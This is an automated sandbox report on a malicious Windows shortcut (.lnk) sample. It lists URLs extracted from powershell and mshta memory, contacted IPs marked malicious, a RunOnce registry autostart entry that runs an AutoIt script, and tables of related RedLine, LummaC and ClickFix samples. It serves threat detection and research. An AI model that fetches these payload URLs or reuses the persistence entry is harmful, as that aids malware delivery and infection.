https://docu-signer.com	powershell.exe, 00000010.00000002.2565392713.0000026A2107F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A20DBE000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000009.00000002.1307064773.000001E400095000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9C9E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A1F971000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001C.00000002.2564549704.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.irs.gov	powershell.exe, 0000000E.00000002.2467331663.000001CA9E915000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.com/api/uz/0912545164/loX	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docu-signer.com/api/uz/0912545164/index.mp4indows	powershell.exe, 00000009.00000002.1311791660.000001E47B750000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docu-signer.com/api/uz/09125451X	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	updater.exe, 0000001B.00000003.1694044915.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000000.1632817858.0000000000C79000.00000002.00000001.01000000.0000000F.sdmp, updater.exe, 0000001B.00000003.1695557372.0000000005F29000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695431806.0000000005C64000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1706860241.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1869894756.0000000000409000.00000002.00000001.01000000.00000011.sdmp, AutoIt3.exe, 0000001D.00000002.1873233315.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867382904.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867936106.0000000005CF4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868040347.0000000005FB9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000002.1946984033.0000000000409000.00000002.00000001.01000000.00000011.sdmp, AutoIt3.exe, 00000021.00000003.1944653433.0000000005BC4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944862681.0000000005E89000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docu-signer.com/api/uz/0912545164/index.mp4LMEMh	mshta.exe, 0000000A.00000002.2552065652.0000026C33744000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docu-signer.com/api/uz/0912545164/log4cX	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docu-signer.com/api/uz/0912545164/index.mp4p	powershell.exe, 00000009.00000002.1307064773.000001E400001000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docu-signer.com/api/uz/0912545164/upX	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000010.00000002.2565392713.0000026A1FB99000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google.com/a/cpanel/index.js&q=EgQILnu9GPTHhLsGIjArISC-HyJoTc3_sjeSAiJbpKJK0RvOcYgC0U9H7A2Kw	powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000010.00000002.2565392713.0000026A1FB99000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 0000000E.00000002.2467331663.000001CA9D721000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000010.00000002.2674622656.0000026A2F9E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.com/	mshta.exe, 0000000A.00000002.2552065652.0000026C33799000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://google.com/a/cpanel/index.js&q=EgQILnu9GITIhLsGIjBWBBsBufMYwqtOw380evxq8HS7zh76erFkFxl8yM_dt	powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 0000000D.00000002.2569003004.0000023B7F085000.00000004.00000020.00020000.00000000.sdmp	false		high
https://google.com/a/cpanel/index.js&q=EgQILnu9GOLHhLsGIjDL2KuyuNUYTTIEgh6bMHZJeyNssyuqlBmCIJbKYgD6G	powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.com/apiX	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	MSBuild.exe, 0000001C.00000002.2564549704.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GPTHhLsGI	powershell.exe, 0000000E.00000002.2467331663.000001CA9D019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9CFDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000010.00000002.2565392713.0000026A1FB99000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.com/api/uz/0912545164/index.mp4DriverData=C:	mshta.exe, 0000000A.00000002.2558478106.0000026C33A90000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.c	powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D3e51fb191164bd69:TM%	powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GOLHhLsGI	powershell.exe, 0000000E.00000002.2467331663.000001CA9CC0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9CE87000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod1C:	svchost.exe, 0000000D.00000003.1340593196.0000023B7EF19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Df40bf7fd73ae2227:TM%	powershell.exe, 0000000E.00000002.2467331663.000001CA9CFDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D015000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.com/api/uz/0912545164/index.mp4P	mshta.exe, 0000000A.00000002.2552065652.0000026C336F6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://docu-signer.comX	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docu-signer.com/api/uz/0912545164/index.mp4O	mshta.exe, 0000000A.00000002.2552065652.0000026C336F6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GK7IhLsGI	powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.com/api/uz/0912545164/updaX	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docu-signer.com/api/uz/0912545164/log4cxx.dllX	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/a/index.js:	powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GKXIhLsGI	powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0C4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D088e5e5b9e5485c9:TM%	powershell.exe, 0000000E.00000002.2467331663.000001CA9CFDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D021000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.irs.	powershell.exe, 0000000E.00000002.2467331663.000001CA9E121000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/a/cpanel/index.js&q=EgQILnu9GLbIhLsGIjCxuDqUvtsLwShhV2mnWCZcd15X9Bz8fRSDQoVfsjclH	powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.com/api/uz/0912545164/index.mp4c	mshta.exe, 0000000A.00000002.2569885759.000002743632B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nopaste.net/sfhgtxfgtb	powershell.exe, 00000010.00000002.2693907531.0000026A37C20000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com(	powershell.exe, 0000000E.00000002.2467331663.000001CA9D309000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D13D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docu-signer.com/api/uz/0912545164/index.mp4a	mshta.exe, 0000000A.00000002.2552065652.0000026C336F6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GITIhLsGI	powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.com/api/uz/0912545164/index.mp4l	mshta.exe, 0000000A.00000002.2552065652.0000026C33744000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docu-signer.com/api/uz/0912545164/index.mp4j	mshta.exe, 0000000A.00000002.2552065652.0000026C336F6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/a/cpanel/index.js&q=EgQILnu9GPzHhLsGIjCsmBBC6xv-VwuUAJpX0iHVNTcTDG8MgDVGCTHNyp8cP	powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.com/api/uz/0912545164/log4cxx.X	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docu-signer.com/api/uz/0912545164/index.mp4;7	powershell.exe, 00000009.00000002.1311985386.000001E47D540000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D06204dc2df8d40ca:TM%	powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D13D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.com/api/uz/0912545164/index.mp4/	mshta.exe, 0000000A.00000002.2571828453.000002743A41B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docu-signer.com/api/uz/0912545164/index.mp4.	mshta.exe, 0000000A.00000002.2571828453.000002743A41B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJ3IhLsGI	powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0D0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.com/api/uz/0912545164/log4cxX	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Deaae9950a8608d92:TM%	powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.com/X	powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000010.00000002.2674622656.0000026A2F9E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.com/api/uz/0912545164/index.mp4C:	mshta.exe, 0000000A.00000002.2552065652.0000026C336D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	MSBuild.exe, 0000001C.00000002.2564549704.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docu-signer.com/api/uz/0912545164/index.mp4=	mshta.exe, 0000000A.00000002.2571828453.000002743A41B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://google.com	powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9CFDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D13D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D202000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.147.124.236	unknown	Russian Federation	20655	E-STYLEISP-ASRU	true
172.217.17.46	google.com	United States	15169	GOOGLEUS	false
104.21.87.65	docu-signer.com	United States	13335	CLOUDFLARENETUS	true
174.138.125.138	nopaste.net	United States	14061	DIGITALOCEAN-ASNUS	true
142.250.181.100	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576504
Start date and time:	2024-12-17 08:09:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	fsg5PWtTm2.lnk renamed because original name is a hash value
Original Sample Name:	26db835c118e06564f8074656bc403862848cc3d0b3761625a07cb4f33790902.lnk.d.lnk
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winLNK@40/79@9/6
EGA Information:	Successful, ratio: 28.6%
HCA Information:	Successful, ratio: 99% Number of executed functions: 110 Number of non-executed functions: 300
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.81.94.65, 104.126.116.72, 104.126.116.66, 23.218.208.109, 172.202.163.200, 2.16.164.97, 2.16.164.105, 20.242.39.171, 172.64.41.3, 162.159.61.3, 23.218.208.137, 52.22.41.97, 52.6.155.20, 3.233.129.217, 3.219.243.226, 23.195.39.65, 23.32.239.56, 199.232.210.172, 184.30.20.134, 20.3.187.198, 2.16.188.171, 2.19.198.27, 13.107.246.63, 54.224.241.105
Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e4578.dscg.akamaiedge.net, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, www.irs.gov.edgekey.net, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, e127382.dscna.akamaiedge.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, fe3.delivery.mp.microsoft
Execution Graph export aborted for target MSBuild.exe, PID 5204 because it is empty
Execution Graph export aborted for target mshta.exe, PID 7444 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7348 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7720 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7844 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:10:08	API Interceptor	2x Sleep call for process: svchost.exe modified
02:10:09	API Interceptor	2750268x Sleep call for process: powershell.exe modified
04:08:29	API Interceptor	2x Sleep call for process: AcroCEF.exe modified
04:08:40	API Interceptor	303974x Sleep call for process: MSBuild.exe modified
10:08:43	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce ggkfcbc "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x
10:08:51	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce ggkfcbc "C:\faggbgb\AutoIt3.exe" C:\faggbgb\ggkfcbc.a3x

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.147.124.236	MHDeXPq2uB.exe	Get hash	malicious	RedLine	Browse	185.147.124.236:9000/wbinjget?q=134E4BB7E28B15E8895E4B76ECC3919A
	n70CrSGL8G.exe	Get hash	malicious	RedLine	Browse	185.147.124.236:9000/wbinjget?q=8587D7BC4236146899B093C1B42EFE08
	7H1FDG3DI1.exe	Get hash	malicious	RedLine, SectopRAT	Browse	185.147.124.236:9000/wbinjget?q=405E1946CFDABCFF1D56C0C7D7E3D09D
	Agreement for Cooperation.PDF.lnk.download.lnk	Get hash	malicious	RedLine	Browse	185.147.124.236:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F
	d0pHF4Pcpc.exe	Get hash	malicious	RedLine, SectopRAT	Browse	185.147.124.236:9000/wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE
	krNl37E9B2.exe	Get hash	malicious	RedLine	Browse	185.147.124.236:9000/wbinjget?q=1E476EF5B7A8411B7DEADA27FB4CC782
	somes.exe	Get hash	malicious	RedLine	Browse	185.147.124.236:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4F
174.138.125.138	http://annavirgili.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse
174.138.125.138	http://annavirgili.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nopaste.net	http://annavirgili.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	174.138.125.138
nopaste.net	http://annavirgili.com	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	174.138.125.138
bg.microsoft.map.fastly.net	SkaKk8Z1J0.exe	Get hash	malicious	LummaC	Browse	199.232.214.172
	#U041e#U043f#U043b#U0430#U0442#U0430.xls	Get hash	malicious	Unknown	Browse	199.232.210.172
	Client-built.exe	Get hash	malicious	Quasar	Browse	199.232.210.172
	wayneenterprisesbatcave-6.0.1901-windows-installer.msi	Get hash	malicious	ScreenConnect Tool	Browse	199.232.214.172
	Untitled-1.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	199.232.210.172
	new.bat	Get hash	malicious	Unknown	Browse	199.232.214.172
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	199.232.214.172
	BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xls	Get hash	malicious	Unknown	Browse	199.232.214.172
	Sample_Order_000000991.xls	Get hash	malicious	Unknown	Browse	199.232.210.172
	InvoiceNr274728.pdf.lnk	Get hash	malicious	LummaC	Browse	199.232.210.172
s-part-0035.t-0009.t-msedge.net	https://essind.freshdesk.com/en/support/solutions/articles/157000010576-pedido-553268637	Get hash	malicious	Unknown	Browse	13.107.246.63
	#U041e#U043f#U043b#U0430#U0442#U0430.xls	Get hash	malicious	Unknown	Browse	13.107.246.63
	Quas_Brout_ncrypt.exe	Get hash	malicious	Quasar	Browse	13.107.246.63
	Client-built.exe	Get hash	malicious	Quasar	Browse	13.107.246.63
	wayneenterprisesbatcave-6.0.1901-windows-installer.msi	Get hash	malicious	ScreenConnect Tool	Browse	13.107.246.63
	bad.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	Yogi Tea Benefits Open Enrollment.eml	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	http://inspirafinancial.com	Get hash	malicious	Unknown	Browse	13.107.246.63
	Remit_Advice_SMKT_84655.htm	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	ME-SPC-94.03.60.175.07.exe	Get hash	malicious	GuLoader	Browse	13.107.246.63

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DIGITALOCEAN-ASNUS	SkaKk8Z1J0.exe	Get hash	malicious	LummaC	Browse	104.131.68.180
	N1sb7Ii2YD.exe	Get hash	malicious	LummaC	Browse	178.62.201.34
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	178.62.201.34
	Client-built.exe	Get hash	malicious	Quasar	Browse	138.68.79.95
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	178.62.201.34
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	104.131.68.180
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse	104.131.68.180
	PO DOC.html	Get hash	malicious	HTMLPhisher	Browse	164.90.188.192
	236236236.elf	Get hash	malicious	Unknown	Browse	138.68.116.54
	MDtEXRDJ3N.html	Get hash	malicious	WinSearchAbuse	Browse	68.183.112.81
E-STYLEISP-ASRU	adv.ps1	Get hash	malicious	LummaC	Browse	185.147.125.51
	d2W4YpqsKg.lnk	Get hash	malicious	LummaC	Browse	185.147.125.51
	MHDeXPq2uB.exe	Get hash	malicious	RedLine	Browse	185.147.124.236
	n70CrSGL8G.exe	Get hash	malicious	RedLine	Browse	185.147.124.236
	7H1FDG3DI1.exe	Get hash	malicious	RedLine, SectopRAT	Browse	185.147.124.236
	Agreement for Cooperation.PDF.lnk.download.lnk	Get hash	malicious	RedLine	Browse	185.147.124.236
	d0pHF4Pcpc.exe	Get hash	malicious	RedLine, SectopRAT	Browse	185.147.124.236
	krNl37E9B2.exe	Get hash	malicious	RedLine	Browse	185.147.124.236
	https://fparnter-externet.com/	Get hash	malicious	CAPTCHA Scam ClickFix, XWorm	Browse	185.147.124.40
CLOUDFLARENETUS	https://essind.freshdesk.com/en/support/solutions/articles/157000010576-pedido-553268637	Get hash	malicious	Unknown	Browse	104.17.25.14
	seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	172.67.187.200
	createdbetterthingswithgreatnressgivenmebackwithnice.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	104.21.84.67
	ppc.elf	Get hash	malicious	Mirai, Moobot	Browse	172.65.156.157
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse	104.21.2.110
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Xmrig	Browse	172.67.129.27
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	188.114.97.3
	https://tinyurl.com/5faazntx	Get hash	malicious	Unknown	Browse	104.18.111.161
	https://solve.jenj.org/awjxs.captcha?u=001e7d38-a1fc-47e3-ac88-6df0872bfe2d	Get hash	malicious	Unknown	Browse	104.21.16.207

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.87.65 174.138.125.138 172.217.17.46 142.250.181.100
	sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.87.65 174.138.125.138 172.217.17.46 142.250.181.100
	createdbetterthingswithgreatnressgivenmebackwithnice.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	104.21.87.65 174.138.125.138 172.217.17.46 142.250.181.100
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.87.65 174.138.125.138 172.217.17.46 142.250.181.100
